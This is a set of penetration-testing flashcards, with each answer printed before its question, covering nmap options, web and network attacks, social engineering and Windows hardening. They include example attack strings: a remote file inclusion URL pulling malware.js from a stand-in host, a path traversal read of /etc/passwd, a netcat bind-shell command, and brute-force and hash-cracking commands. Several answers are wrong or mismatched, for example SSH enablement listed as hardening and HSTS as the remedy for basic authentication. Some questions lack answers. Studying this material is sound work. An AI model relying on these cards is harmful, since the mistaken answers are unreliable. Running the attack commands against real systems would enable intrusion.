HTTP parameter pollution (HPP)
What type of vulnerabilities can be triggered by using the parameters in the following URL? https://store.h4cker.org/?search=cars&results=20&search=bikes
Weakness ID Modes of introduction Likelihood of exploit
Which of the following is an identifier provided for CWE entries?
Compliance scan
Security Content Automation Protocol (SCAP) aware scanners, such as Tenable's Nessus, test the implementation of best-practice security configuration baselines from the Center for Internet Security (CIS). For which type of scan are these baselines most helpful?
APT
Which of the following threat actors is probably the most dangerous based on the adversary tier list?
Authority
Several employees of an organization were recently victims of a phishing attack. They received an email that appeared to come from the company president. The email stated that the employees would receive disciplinary action if they did not do as the emailed instructed and click a link in the message. What principles of social engineering did the attacker use?
Follow-up actions
Several months after completing a penetration test, your client calls and asks you to come back and retest their network to verify that the problems you initially discovered have been properly remediated. What is this process called?
Central processing unit (CPU) RAM
Smartphones and tablet devices are typically built using a system on a chip (SoC), which is a small integrated circuit composed of several physical components, including which of the following? (Choose two.)
XSS attacks
Software developers should escape all characters (including spaces but excluding alphanumeric characters) with the HTML entity &#xHH; format to prevent what type of attack?
By abusing the lack of an authentication process for STP and crafting malicious Bridge Protocol Data Units (BPDUs), selecting a nonexistent switch as the root bridge, and triggering repeated BPDUs from other hosts on the network until a broadcast storm is achieved and the network becomes unresponsive
Spanning Tree Protocol (STP) optimizes switched (that is, Layer 2) networks by ensuring there are no switching loops, and the most effective attacks against it are DoS attacks. Which of the following answers best describes a method for an attacker to specifically target STP and the networks it protects?
Client-side injection attack attempts, such as SQL injection or local file inclusion
Static analysis (sometimes called static application security testing, or SAST) is a debugging method used to examine source code, bytecode, and binaries without execution. Which of the following is not a test case commonly employed as part of static analysis?
Industrial control systems (ICS) used in manufacturing, power generation, water treatment, and other public works
Supervisory Control and Data Acquisition (SCADA) is a real-time control system that monitors the health and status of components of what type of infrastructure?
Unnecessary open services
System hardening is the process of reducing available attack surface in order to mitigate which of the following findings?
Password complexity Data isolation
Systems governed by compliance frameworks such as PCI DSS and HIPAA are often required to meet standards of which of the following? (Choose two.)
Firmware
The CAPEC details thousands of known attack patterns and methodologies. Which of the following is not an attack domain recognized by CAPEC?
base
The CVSS exploitability metrics are part of the __________ metric group.
Processing and rendering of visual data to be displayed
The GPU in a computing system (mobile or otherwise) serves what function?
National Vulnerability Database (NVD)
The National Institute of Standards and Technology (NIST) maintains what public resource for analysis on vulnerabilities published to the CVE dictionary, using the Common Vulnerability Scoring System (CVSS)?
Sandbox escape
The SELinux and AppArmor security frameworks include enforcement rules that attempt to prevent which of the following attacks?
executive summary
The _____________ section of the report should be written in a way that can be understood by a nontechnical audience.
finding and recommendations
The _________________ section of a penetration testing report should contain the technical details of the findings from your testing.
Principle of authority
The chief financial officer (CFO) receives an email from the chief executive officer (CEO) indicating that a new vendor needs to be issued a wire transfer. However, neither the CFO nor the CEO knows who this new vendor is. The CEO claimed that he never sent the email requesting the transfer. What type of motivation technique is the attacker attempting?
Positive attestation of findings
The collection of screenshots of discovered vulnerabilities is one of the easiest methods to provide or facilitate which of the following?
-oN
Which option causes nmap to save its output to a standard text file in the file system of the host where it was run?
Egress sensor bypass
The exterior double glass door to a facility has a motion sensor installed that automatically unlocks the door when someone is leaving the facility. To gain unauthorized access to the facility, a penetration tester sprays a can of air duster in the center crack between the doors to trigger the motion sensor and unlock the door. What is this technique called?
SOAP project file
The function of which support resource is to define a format used for sending and receiving messages?
HAL ART
The native C and C++ libraries present in Android provide support for which of the following applications? (Choose two.)
Weak credentials exploit
The network administrator for an organization that is the target of a penetration test configured her network firewall with an administrative username of admin and a password of password. Which authentication exploit is this device vulnerable to?
Vishing
The president of an organization reported that he has been receiving a number of phone calls from someone claiming to be with the help desk department. This individual is asking for the CEO to verify his network authentication credentials because his computer is broadcasting across the network. What type of attack is taking place?
Remote file inclusion
What type of vulnerability or attack is demonstrated in the following URL? http://web.h4cker.org/?page=http://malicious.h4cker.org/malware.js
Network threats Host threats Application threats
The types of threats identified during the threat modeling process include which of the following? (Choose three.)
Injection attacks
The vulnerability represented by which of the following findings has been number one on the OWASP Top 10 list for a number of years and can often result in theft or destruction of data, or even complete system compromise?
Unnecessary open services
The vulnerability represented by which of the following findings weakens an organization's security posture by increasing its viable attack surface without a business need?
Directory (path) traversal
What type of vulnerability or attack is demonstrated in the following URL? https://store.h4cker.org/buyme/?page=../../../../../etc/passwd
Impact analysis
This key aspect of requirements management is the formal approach to assessing the potential pros and cons of pursuing a course of action.
Fuzzing
Tyson is performing a gray box penetration test. The target organization relies heavily on an application that was developed by internal programmers. He runs the application and then uses a utility to send random, unexpected data to the application's inputs and analyzes how it responds. What kind of application analysis is happening in this scenario?
Enable HTTP Strict Transport Security (HSTS)
Upon completing testing on an Internet-facing application, the penetration tester notices that the application is using only basic authentication. What is the best remediation strategy that the tester should recommend to the client?
-oG
Which option causes nmap to save its output to a text file that can be quickly searched using the grep command?
Badge cloning
Using reconnaissance, a penetration tester learns that the target organization's employees use RFID access badges to unlock doors within the facility. Using the company's website, he identifies high-level employees within the organization. Then he waits in the parking lot until he sees one of these individuals heading toward the front doors. He walks behind them into the reception area with a small RFID reader hidden in his coat. He captures the RFID signature from the individual's badge and then creates his own fake access badge and encodes it with that RFID signature. What is this technique called?
To share files on the network To share printers on the network
What are the functions of the Server Message Block (SMB) protocol? (Choose two.)
They are prone to data emanation.
What are the risks of enabling serial console connections on network devices such as routers and switches?
User accounts created Shells spawned Any files left behind
What elements should you be sure to remove from an exploited system before finalizing a penetration test?
Pivoting
What is another term for lateral movement?
Hashed account passwords
What is stored in the SAM database on a Windows system?
Perform system hardening.
What is the best recommendation to give to a client to mitigate a vulnerability if a penetration tester was able to enter a SQL injection command into a text box and gain access to the information stored on the database?
Implement a strict HSTS policy that prevents a user's browser from opening a page unless an HTTPS connection has been used.
What is the best way to defend against an SSL stripping attack?
Install the latest operating system updates.
What is the best way to defend against kernel exploits?
Validate all findings
What is the best way to ensure that you do not have false positives listed in your final report?
3000
What is the default TCP port the Dradis Framework runs on?
Triggers TCP SYN discovery to named ports
What is the effect of the -PS flag in nmap?
Disables ping and skips host discovery
What is the effect of the -Pn flag in nmap?
Increases the verbosity level of scan output
What is the effect of the -v flag in nmap?
Launching a port scan to the 10.1.2.3 host (scanning for ports 1 through 1024)
What is the following PowerShell command doing? 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.1.2.3",$_))"$_ is open!"} 2>$null
Launching a brute-force attack against an SSH server
What is the following command doing? root@kali:~# ncrack -p 22 --user dave -P my_list 172.18.104.166Starting Ncrack 0.6 ( http://ncrack.org ) at 2018-06-25 16:55 EDTDiscovered credentials for ssh on 172.18.104.166 22/tcp:172.18.104.166 22/tcp ssh: dave 'password123'Ncrack done: 1 service scanned in 3.00 seconds.Ncrack finished.
Cracking passwords
What is the following command used for? hashcat --force -m 0 -a 0 -o words file1 file2
To transfer email messages between mail transfer agents (MTAs)
What is the function of the Simple Mail Transfer Protocol (SMTP)?
False positives
What is the main concern with cutting and pasting the results directly from an automated vulnerability scan?
Obtaining written authorization from the client
What is the most important step in the penetration testing planning and scoping process?
Dumpster diving
What is the practice of searching through a target's trash in the hope of finding information that may be of value during a penetration test, such as passwords, usernames, or meeting information that can help when establishing a pretext for a physical penetration test?
Penetration testing report
What is the primary deliverable for a contracted penetration tester?
Active information gathering
What is the process by which large data sets are analyzed to reveal patterns or hidden anomalies?
Threat modeling
What is the process by which risks associated with an organization's information systems are identified, quantified, and addressed?
Omission of findings lower than 3.0 on the CVSS 3.0
When preparing a penetration test report, which of the following is not a recommended best practice?
A reverse DNS query will be run for all discovered ranges.
When used as part of a search through theharvester, what will be the effect of the -n flag?
declare -i TOTAL
Which Bash script command will create a new variable named TOTAL and set its type to be integer?
Supply Chain
Which CAPEC-recognized domain of attack focuses on the manipulation of computer hardware and software within their respective lifecycles?
Ret2libc
Which Linux exploit causes the return address of a subroutine to be replaced by the address of a subroutine that is already present in a process's' memory?
Sticky bit
Which Linux special permission, when assigned to a directory, prevents users from deleting files they do not own, even if they have write and execute permissions to the directory?
Double tagging
Which VLAN-hopping technique prepends an otherwise unauthorized VLAN tag to traffic originating from the default VLAN? This traffic is then forwarded to the intended target by the next switch, as if it originated from that unauthorized VLAN, effectively bypassing Layer 3 access control schemes.
Account lockout duration
Which Windows Group Policy setting determines how long a user's account will stay locked if the wrong password has been entered too many times?
Reset account lockout counter after
Which Windows Group Policy setting determines how much time must pass after a failed logon attempt before the failed logon attempt counter is reset to 0?
Unattended installations via PXE
Which Windows feature could potentially allow authentication credentials to be transferred as clear text over a network connection?
Core Services
Which abstraction layer of iOS facilitates fundamental services such as networking and file access?
Proof-of-concept development
Which act describes the writing of a first-of-its-kind exploit to demonstrate or weaponize a vulnerability?
RFID cloning
Which attack enables a penetration tester to duplicate access cards and is of particular value during physical penetration tests?
Jamming
Which attack is a DoS method specifically used to target wireless communication protocols?
Clickjacking
Which authentication exploit utilizes transparent layers within the same web page to trick a user into clicking a button or link when they thought they were just clicking the top-level layer of the page?
Parameter pollution Insecure direct object reference exploit
Which authorization exploits modify a parameter in an HTTP request to gain unauthorized access to information? (Choose two.)
Application layer attacks
Which category of DoS attack attempts to crash a service outright, with its severity measured in requests per second (Rps):
Advanced persistent threat
Which category of threat actor is highly skilled, frequently backed by nation-state-level resources, and is often motivated by obtaining sensitive information (such as industrial or national secrets) or financial gain?
Insecure direct object reference
Which category of vulnerability is present when a web application provides access to information based solely on user-provided input, as demonstrated in the following sample URL?https://127.0.0.1/salesrecords?salesreceipt=11532
Unvalidated redirect
Which category of web vulnerability occurs when web applications accept untrusted input from users before leading them to a new page?
SQL injection
Which class of attack targets relational databases and can be used to bypass authentication systems; reveal, alter, or destroy data; or even obtain system-level shell access, given the right conditions? It typically relies on a lack of filtering of escape characters in user input or a lack of sufficient control parameters applied to user input, and is best mitigated through the use of parameterized queries.
Persistent XSS
Which client-side attack is part of a class of injection attack that embeds malicious code into a website, frequently one trusted by the victim? In this particular variety, user-provided data is stored on a website that then triggers the execution of code—usually a string of JavaScript.
test
Which command can be used from within an if/then flow control structure in a Bash script to evaluate whether a specified condition is true?
echo $TargetHost
Which command in a PowerShell script will cause it to write the value of a variable named TargetHost on the screen?
print (TargetHost)
Which command in a Python script will cause it to write the value of a variable named TargetHost on the screen?
puts TargetHost
Which command in a Ruby script will cause it to write the value of a variable named TargetHost on the screen?
-sV
Which command option causes nmap to detect services running on a target host and report the version number of any services found?
tcpdump
Which command-line exclusive network protocol analysis tool allows for the capture of packet dumps to and from a given network interface or host, so they may be inspected to determine server responses or related network behavior?
Executive summary
Which component of a written penetration test report is meant to provide a high-level overview of findings without getting too wrapped up in the technical details?
Content providers
Which component of an Android application is functionally a SQLite database that stores data in the form of a flat file?
Airmon-ng
Which component of the aircrack-ng suite of tools is used to put wireless adaptors into monitor mode?
Nondisclosure agreement (NDA)
Which contractual document is a confidentiality agreement that protects the proprietary information and intellectual property of a business?
if/then/else
Which control structure is considered to be a flow control structure?
until loop
Which control structure will keep processing over and over as long as the specified condition evaluates to false?
while loop
Which control structure will keep processing over and over until a specified condition evaluates to false?
for loop
Which control structure will process a specified number of times?
Cold boot attack
Which cryptographic side-channel attack is used to retrieve encryption keys or other data remnants from an operating system and is accomplished by hard rebooting the target system and loading a lightweight OS controlled by the attacker, from which the pre-boot contents of system RAM are written to a file to be parsed later?
Parameterizing queries
Which defense against SQL injection attacks involves using prepared SQL statements with bounded variables?
Statement of work
Which document outlines the project-specific work to be executed by a penetration tester for an organization?
Vulnerability severity rating
Which element of a penetration test report aims to provide a normalized and standardized representation of discovered vulnerabilities and the overall threat they present to an affected system or network?
WEP
Which encryption protocol was part of the original standard for 802.11 wireless communications and is considered a broken encryption algorithm?
Vishing
Which exploit relies on a telephone call to convince someone to reveal sensitive information?
SMS phishing
Which exploit relies on text messaging to deliver phishing messages?
Phishing
Which exploit sends emails indiscriminately to a large number of the target organization's employees, anticipating that a percentage of them will click the malicious link contained in the message?
Spear phishing Whaling
Which exploits require the penetration tester to first conduct extensive reconnaissance to identify specific, high-value individuals to target within the organization? (Choose two.)
REST API
Which feature in Shodan is a collection of documentation that may be useful for developers who want to integrate Shodan searching into tools or applications they have developed or are currently developing?
Shared local administrator credentials Passwords stored in plaintext
Which findings reduce an organization's security posture through both the simplification of lateral movement for a theoretical adversary and by destroying the concept of non-repudiation and verification of individuals responsible for actions under a given username? (Choose two.)
Document Object Model (DOM)
Which form of a cross-site scripting (XSS) attack leverages an older, vulnerable web browser being run locally on the victim's computer?
Stored/persistent Reflected
Which forms of a cross-site scripting (XSS) attack are considered to be a server-side exploits? (Choose two.)
FOCA
Which free and GNU-licensed tool written for the Windows operating system family gathers information by scraping metadata from Microsoft Office documents, which can include usernames, e-mail addresses, and real names?
ATT&CK
Which knowledge base maintained by MITRE details techniques and adversarial behavior that can be used to attack organizations?
GLBA
Which law regulates how financial institutions handle customers' personal information?
HIPPA
Which law requires that healthcare-related organizations must be in compliance with certain security standards?
SARBOX
Which law sets standards for publicly traded companies in the United States with respect to security policies, standards, and controls?
Scrubbing
Which lock-picking technique is performed by swiftly and repeatedly dragging a pick back and forth across the pins in a tumbler while adjusting the pressure on the torque wrench?
Double-tagging
Which method is commonly used to hop between VLANs?
Evil twin
Which method of attacking Wi-Fi networks occurs when an attacker creates a wireless access point with an ESSID identical to one to which an unwitting user intends to connect? As they negotiate a connection, users pass authentication information to this malicious access point, enabling attackers to recover victim device user traffic or access credentials. This attack frequently abuses the fact that wireless networks are typically presented in order of signal strength and can therefore benefit from high-gain wireless antennae or close physical proximity to a connecting client.
File excavation
Which method of collecting open-source intelligence consists of the collection of published documents, such as Microsoft Office or PDF files, and parsing the information hidden within to reveal usernames, e-mail addresses, or other sensitive data?
APK Studio
Which mobile tool can be used to reverse engineer an APK file from a mobile device running the Android operating system?
APKX
Which mobile tool is a Python wrapper that can extract Java source code directly from an Android APK executable?
Drozer
Which mobile tool provides an attack framework that can be used to exploit mobile devices running the Android operating system?
Authority
Which motivation factor gets people to act because someone with clout wants them to?
Social proof
Which motivation factor gets people to act because they believe that "everyone else is doing it"?
Likeness
Which motivation factor gets people to act because they want to please the person making a request of them?
Fear
Which motivation factor gets people to act because they worry about the consequences of not acting?
Urgency
Which motivation factor gets people to act quickly because they believe someone needs help?
Scarcity
Which motivation factor gets people to act quickly due to a sense of limited supply?
Authority
Which motivation technique attempts to leverage a person's respect for leadership in legal, organizational, or social contexts to gain access to property or controlled information?
DNS
Which name resolution service serves internal and external networks, providing resolution for requests sent to port 53/UDP and zone transfers over port 53/TCP?
DNS cache poisoning
Which network-based attack consists of overwriting a name resolution cache with a malicious web address, resulting in targeted users visiting the malicious site rather than the one they intended to visit?
LLMNR/NBT-NS poisoning
Which network-based attack is performed against targets that use NTLM authentication by responding to name resolution requests while impersonating authoritative sources on the network, and results in the target sending their username and NTLMv2 hash to the attacker when successful?
-n
Which nmap flag is used to disable DNS resolution of hostnames?
-iL
Which nmap flag should precede a file containing a list of targets to be scanned?
--proxies
Which nmap option causes the utility to relay connections through a proxy server?
-p- 1-65535
Which nmap switch must a penetration tester use if they want to scan all the TCP ports on an identified device?
-T5
Which nmap timing option causes it to scan in Insane mode?
-T0
Which nmap timing option causes it to scan in Paranoid mode?
-T2
Which nmap timing option causes it to scan in Polite mode?
smb-enum-shares nfs-showmount
Which of the following NSE scripts would be best used to enumerate shared storage volumes on a network? (Choose two.)
-sT
Which of the following Nmap options would you use to perform a TCP connect scan?
Invoke-ReflectivePEInjection
Which of the following PowerSploit scripts can reflectively inject a DLL into a remote process?
Enforce password history
Which of the following Windows Group Policy settings can be used to prevent a user from reusing the same password over and over?
Maximum password age
Which of the following Windows Group Policy settings determines how long a user can keep the same password before being required to change it to a new one?
Minimum password age
Which of the following Windows Group Policy settings determines how long a user must keep the same password before being allowed to change it to a new one?
Store passwords using reversible encryption
Which of the following Windows Group Policy settings should never be enabled?
PS Remoting WinRM
Which of the following Windows features can be used to remotely manage Windows systems over a network connection? (Choose two.)
Dynamic code analysis Fuzzing
Which of the following application scanning techniques are performed on running applications? (Choose two.)
Static code analysis
Which of the following application scanning techniques is performed by reviewing an application's source code?
Fuzzing
Which of the following application scanning techniques is performed by sending random, unexpected, or invalid data to the inputs of an application to see how it responds?
Web Application Description Language (WADL)
Which of the following architectures is used to provide an XML-based description of HTTP-based web services running on a web application server and is commonly used with Representational State Transfer (REST) web applications?
Use Group Policy to configure account lockout. Delete or disable all unused user accounts.
Which of the following are common methods used to harden user accounts on a Windows-based computer system? (Choose two.)
Use Group Policy to enforce password complexity requirements. Use Group Policy to enforce password aging requirements.
Which of the following are common methods used to harden user accounts on a Windows-based computer system? (Choose two.)
Medusa Hydra
Which of the following are commonly used to perform brute-force password attacks? (Choose two.)
FTP Telnet
Which of the following are considered unsecure services or protocols? (Choose two.)
SQL injections HTML script injections Object injections
Which of the following are examples of code injection vulnerabilities?
Shell upgrade Virtual machine (VM) escape Container escape
Which of the following are examples of sandbox escape exploits? (Choose three.)
Including comments in the source code Providing verbose error messages
Which of the following are examples of unsecure coding practices?
Lack of error handling routines Lack of code signing
Which of the following are examples of unsecure coding practices?
Applications running within a container environment may not be detectable by traditional vulnerability scans. Vulnerabilities associated with the base operating system of the container host may be inherited by its containers.
Which of the following are issues you may need to consider when performing a vulnerability scan within an organization that runs network applications within containers? (Choose two.)
Dispute resolution practices Indemnification clauses
Which of the following are items typically addressed in a master service agreement (MSA)? (Choose two.)
PowerShell PSExec WMI
Which of the following are legitimate Windows tools that can be used for post-exploitation tasks?
Creating and manipulating scheduled jobs and tasks Creating custom daemons and processes Creating new users
Which of the following are post-exploitation activities to maintain persistence in a compromised system?
Rooting or jailbreaking Inconsistent updating
Which of the following are security weaknesses associated with mobile devices? (Choose two.)
ICS SCADA
Which of the following are special network devices that are commonly used to control manufacturing equipment and environmental systems? (Choose two.)
Maltego Shodan Dig
Which of the following are tools commonly used for passive reconnaissance?
It is commonly used in the absence of a DNS server. It allows the IPv6 host to resolve hostnames on the same local link.
Which of the following are true of the Link-Local Multicast Name Resolution (LLMNR) protocol? (Choose two.)
Compliance-based Goals-based
Which of the following are types of point-in-time assessments? (Choose two.)
The community string is valid for every SNMPv1 node. The community string is transmitted as clear text.
Which of the following are vulnerabilities associated with the SNMPv1 protocol? (Choose two.)
Using unquoted service paths Replacing executables for writable services
Which of the following are ways in which services on a Windows system can be exploited? (Choose two.)
Organized crime Nation-state
Which of the following attackers are most likely to be able to carry out an advanced persistent threat (APT)? (Choose two.)
An individual within the target organization who has a direct line of communication with the penetration tester
Which of the following best describe a trusted agent during a penetration test?
Identifies and authenticates a user's device on a cellular network
Which of the following best describes the role of a subscriber identity module (SIM) on a mobile device?
Making unauthorized changes to information
Which of the following best describes the term alteration within the context of penetration testing?
Ensuring information remains available for authorized access
Which of the following best describes the term availability within the context of penetration testing?
Preventing unauthorized access to information
Which of the following best describes the term confidentiality within the context of penetration testing?
Preventing the legitimate use of information
Which of the following best describes the term denial within the context of penetration testing?
Gaining unauthorized access to information
Which of the following best describes the term disclosure within the context of penetration testing?
Preventing unauthorized modifications to information
Which of the following best describes the term integrity within the context of penetration testing?
A penetration tester must think like an adversary who might attack the system in the real world.
Which of the following best describes the term the hacker's mindset within the context of penetration testing?
Administratively configure access ports as access ports so that users cannot negotiate a trunk; also disable the negotiation of trunking (that is, do not allow Dynamic Trunking Protocol [DTP]). Limit the number of MAC addresses learned on a given port with the port security feature. Control Spanning Tree to stop users or unknown devices from manipulating it. You can do so by using the BPDU Guard and Root Guard features.
Which of the following best practices help protect against VLAN hopping and Layer 2 attacks?
Keyloggers
Which of the following can attackers use to capture every keystroke of a user in a system and steal sensitive data (including credentials)?
Information from the organization's DNS registrar Job postings on the organization's website
Which of the following can be considered OSINT related to the target of a penetration test? (Choose two.)
Social media posts Corporate tax filings
Which of the following can be considered OSINT related to the target of a penetration test? (Choose two.)
RDP, Apple Remote Desktop, and VNC
Which of the following can be used for lateral movement?
PowerShell
Which of the following can be used for post-exploitation activities?
Patator Aircrack-ng
Which of the following can be used to perform brute-force password attacks? (Choose two.)
X11 forwarding
Which of the following can be used to remotely manage Linux systems over a network connection using a graphical user interface?
ARD
Which of the following can be used to remotely manage Macintosh systems over a network connection using a graphical user interface?
RDP
Which of the following can be used to remotely manage Windows systems over a network connection using a graphical user interface?
VNC
Which of the following can be used to remotely manage Windows, Macintosh, or Linux systems over a network connection using a graphical user interface (as long as the necessary software is installed)?
Wordlists
Which of the following can be used with John the Ripper to crack passwords?
Rainbow table attacks reduce compute cycles at attack time. Rainbow tables must include precompiled hashes.
Which of the following characteristics distinguish between rainbow table attacks from brute-force attacks? (Choose two).
The amount and kinds of risk an organization is willing to accept in its information systems environment
Which of the following choices best defines the term "risk appetite" with regard to information security?
nc -lvp 8899
Which of the following commands creates a listener on a system on port 8899?
python -m SimpleHTTPServer
Which of the following commands launches a simple HTTP web service that serves the file on the present working directory?
nmap -sS 10.1.1.1
Which of the following commands performs a TCP SYN scan?
DES RC4 MD5
Which of the following cryptographic algorithms should be avoided? (Select all that apply.)
Which of the following data sources is not a valid option in theharvester?
It lacks security controls. A malicious host can advertise itself as any host it wants to.
Which of the following describe the security risks associated with using the LLMNR protocol? (Choose two.)
It is used to enumerate DNS information about a given hostname or IP address. It is useful for passive reconnaissance. It can query several data sources, including Baidu, Google, LinkedIn, public Pretty Good Privacy (PGP) servers, Twitter, vhost, Virus Total, ThreatCrowd, CRTSH, Netcraft, Yahoo, and others.
Which of the following describes one of the uses of Theharvester?
The Netcat utility is used to create a bind shell on the victim system and to execute the bash shell.
Which of the following describes what the nc -lvp 2233 -e /bin/bash command does?
Embedded devices Smart IoT appliances
Which of the following devices would probably have the weakest inherent security? (Choose two.)
Statement of work
Which of the following documents would detail the timeframe for which a penetration testing organization should retain copies of a report that it provided to a client?
#!/bin/bash
Which of the following elements must be included at the beginning of every Bash script?
A government contractor A multinational bank
Which of the following entities are most likely to become the target of an advanced persistent threat (APT)? (Choose two.)
EternalBlue WannaCry
Which of the following exploits are facilitated by weaknesses in the SMB protocol? (Choose two.)
Full Disclosure
Which of the following is a public, vendor-neutral forum and mailing list that publishes vulnerability analysis details, exploitation techniques, and other relevant information for the security community?
Seccomp
Which of the following is a sandbox built in the Linux kernel to only allow the write(), read(), exit(), and sigreturn() system calls?
Encrypt the file with AES-256, provide it to the declared recipients as detailed in your statement of work, and determine a secondary communication channel through which to send the decryption password (if not previously declared in the SOW)
Which of the following is a secure, reasonable method for the handling and disposition of a penetration test report?
LSASS
Which of the following is a service that runs on a Windows system and enforces the security policy of the system?
Static and dynamic binary analysis
Which of the following is a technique that is executed using disassemblers and decompilers to translate an app's binary code or bytecode back into a more or less understandable format?
SQLmap
Which of the following is a tool that can help automate the enumeration of vulnerable applications, as well as the exploitation of SQL injection vulnerabilities.?
Mimikatz
Which of the following is a tool used by many penetration testers, attackers, and even malware that can be useful for retrieving password hashes from memory and is also a very useful post-exploitation tool?
Enum4linux
Which of the following is a tool used to enumerate SMB shares, vulnerable Samba implementations, and corresponding users?
Ret2libc
Which of the following is a type of attack in which a subroutine return address on a call stack is replaced by an address of a subroutine that is already present in the executable memory of the process?
Race condition
Which of the following is a type of attack that takes place when a system or an application attempts to perform two or more operations at the same time?
Trojan
Which of the following is a type of malware that provides a useful function but secretly performs malicious actions when it is run?
PsExec
Which of the following is a utility that can be used on Windows systems that allows you to establish command-line access to the console of a remote Windows system, much like the older Telnet client?
Web Service Description Language (WSDL)
Which of the following is an XML-based interface definition language used to describe the functionality offered by a Simple Object Access Protocol (SOAP) server?
Host discovery
Which of the following is an active scanning technique used to aid in the process of information gathering, with the goal of identifying hosts that are alive and listening on the network?
Cold boot
Which of the following is an attack in which the attacker tries to retrieve encryption keys from a running operating system after using a system reload?
HTTP Strict Transport Security is not enabled on a system web application.
Which of the following is an example of a failure to apply best practices typical of those detailed in the results of a vulnerability scan?
Computer-controlled manufacturing equipment
Which of the following is an example of a nontraditional asset?
Web-enabled television monitor
Which of the following is an example of a nontraditional asset?
OS fingerprinting reveals a system running Windows XP SP2, suggesting susceptibility to MS08-067.
Which of the following is an example of a vulnerability identification that is typical of those detailed in the results of a vulnerability scan?
DVWA WebGoat Hackazon
Which of the following is an example of a vulnerable application that you can use to practice your penetration testing skills?
OWASP Zed Attack Proxy (ZAP) W3AF Burp Suite
Which of the following is an example of a web application penetration testing tool?
A web application's robots.txt file specifically denies all access to the /cgi-bin/ directory.
Which of the following is an example of an observation typical of those detailed in the results of a vulnerability scan?
Fuzzing a running web application with garbage input to assess the application's reaction
Which of the following is an example of dynamic application analysis?
Biometric scan + PIN
Which of the following is an example of multifactor authentication?
password + security token generator
Which of the following is an example of multifactor authentication?
Analyzing the written code for an application outside of an actively running instance
Which of the following is an example of static application analysis?
Username + PIN + fingerprint scan + one-time password (OTP)
Which of the following is an example of three-factor authentication (3FA)?
PIN + fingerprint scan + security token
Which of the following is an example of two-factor authentication (2FA)?
Shift
Which of the following is an external resource or API that may be installed in Maltego to expand its capabilities?
A tool that attempts to present threats in a normalized and standardized manner based on impact to the key tenants of confidentiality, integrity, and availability, such as the CVSS
Which of the following is the best choice available for a vulnerability severity rating scale when writing a penetration test report?
Send spoofed emails to the staff to see if they will respond with sensitive information.
Which of the following is the best course of action for a penetration tester who is required to perform open-source intelligence (OSINT) on the staff at a target company after completing the infrastructure aspect?
Tailgating
Which of the following is the term for an unauthorized individual following an authorized individual to enter a restricted building or facility?
In DOM-based XSS, the payload is never sent to the server. Instead, the payload is only processed by the web client (browser).
Which of the following is true about DOM-based XSS?
Metasploit was created using the Ruby programming language. You can use Ruby to create exploits, scripts, and modules in Metasploit.
Which of the following is true about Metasploit?
Shodan is an organization that continuously scans the Internet and exposes its results to users via its website. Attackers can use this tool to identify vulnerable and exposed systems on the Internet (such as misconfigured IoT devices and infrastructure devices). Penetration testers can use this tool to gather information about potentially vulnerable systems exposed to the Internet without actively scanning their victims.
Which of the following is true about Shodan?
Clickjacking involves using multiple transparent or opaque layers to induce a user to click on a web button or link on a page that he or she did not intend to navigate or click. Clickjacking attacks are often referred to "UI redress attacks." User keystrokes can also be hijacked using clickjacking techniques. It is possible to launch a clickjacking attack by using a combination of CSS stylesheets, iframes, and text boxes to fool the user into entering information or clicking on links in an invisible frame that could be rendered from a site an attacker created.
Which of the following is true about clickjacking?
Reflected XSS attacks are not persistent.
Which of the following is true about reflected XSS?
A restricted deletion flag, or sticky bit, is a single bit whose interpretation depends on the file type. For directories, the sticky bit prevents unprivileged users from removing or renaming a file in the directory unless they own the file or the directory; this is called the restricted deletion flag for the directory, and is commonly found on world-writable directories such as /tmp. For regular files on some older systems, the sticky bit saves the program's text image on the swap device so it will load more quickly when run.
Which of the following is true about sticky bits?
SET
Which of the following is typically not used as a post-exploitation tool?
RPC/DCOM
Which of the following is used on Windows system to allow you to remotely execute code on another Windows system somewhere else in the network?
Using unsecure file and folder permissions
Which of the following issues could enable a penetration tester to execute a DLL hijacking exploit on a Windows system?
Database
Which of the following items must be cleaned up during post-engagement activities when a web application test includes SQL injection?
Install extra system RAM and then disable the Windows paging file. Disable unneeded services.
Which of the following methods are commonly used to harden Windows-based computer systems? (Choose two.)
Enable and configure iptables.
Which of the following methods is commonly used to harden Linux-based server systems?
Enable the secure shell (SSH) service.
Which of the following methods is commonly used to harden Linux-based server systems?
Disable autorun.
Which of the following methods is commonly used to harden Windows-based computer systems?
Close all ports in the Windows firewall and then open only those needed by installed services.
Which of the following methods is commonly used to harden network communications on Windows-based computer systems?
Restrict network access to only authenticated users.
Which of the following methods is commonly used to harden network communications on Windows-based computer systems?
CSRF
Which of the following occurs when a user who is authenticated by an application through a cookie saved in the browser unwittingly sends an HTTP request to a site that trusts the user, subsequently triggering an unwanted action?
Empire PowerSploit
Which of the following penetration tools are based on Windows PowerShell? (Choose two.)
Network Access Control (NAC)
Which of the following prevents unauthorized or unhealthy devices from connecting to a network, even if they connect to the wired or wireless network properly?
HTTP
Which of the following protocols is the Representational State Transfer (REST) web application architecture based on?
WMI
Which of the following provides an infrastructure for managing Windows systems over the network from a centralized location?
FIPS 140-2
Which of the following provides standards that certify cryptographic modules?
cPassword
Which of the following refers to the name of the attribute that stores passwords in a Windows Group Policy Preference item?
Explicit detailing of terms and conditions that are previously agreed to trigger a shift in goal priorities in the engagement's statement of work or rules of engagement A client request to expend additional effort on a previously identified vulnerable system rather than begin testing on a separate subnet
Which of the following represent examples of goal reprioritization? (Choose all that apply.)
Which of the following search engines is not used by FOCA when searching for documents?
reg save HKLM\System\CurrentControlSet\Services\Sv.reg
Which of the following should be used if a penetration tester is attempting to achieve persistence by compromising a Windows server?
Embedding an XSS payload on an intranet site that is widely used within the organization for incident management and reporting
Which of the following social engineering attacks is an example of waterholing?
Attackers can use rainbow tables to accelerate password cracking. Rainbow tables, which are precomputed tables for reversing cryptographic hash functions, can be used to derive a password by looking at the hashed value. A tool called RainbowCrack can be used to automate the cracking of passwords using rainbow tables.
Which of the following statements are true? (Select all that apply.)
That the corporate systems must store passwords using the MD5 hashing algorithm
Which of the following statements would come from a client's corporate policy?
Deleting temporary files Deleting application logs Suppressing syslog messages
Which of the following tasks helps you cover your tracks to remain undetected?
Schedule jobs using cron to run exploit scripts or start daemons.
Which of the following techniques can be used to establish persistence during a penetration test that involves Linux systems?
Using scheduled tasks Using DLL hijacking
Which of the following techniques can be used to help retain persistence for an exploit on a Windows system? (Choose two.)
Credential brute-forcing
Which of the following techniques involves sending one password after another at an authentication system in an attempt to find the right one?
Dictionary attack
Which of the following techniques involves sending passwords, one after another, from a list of commonly used passwords in an attempt to find the right one?
Normalization of data
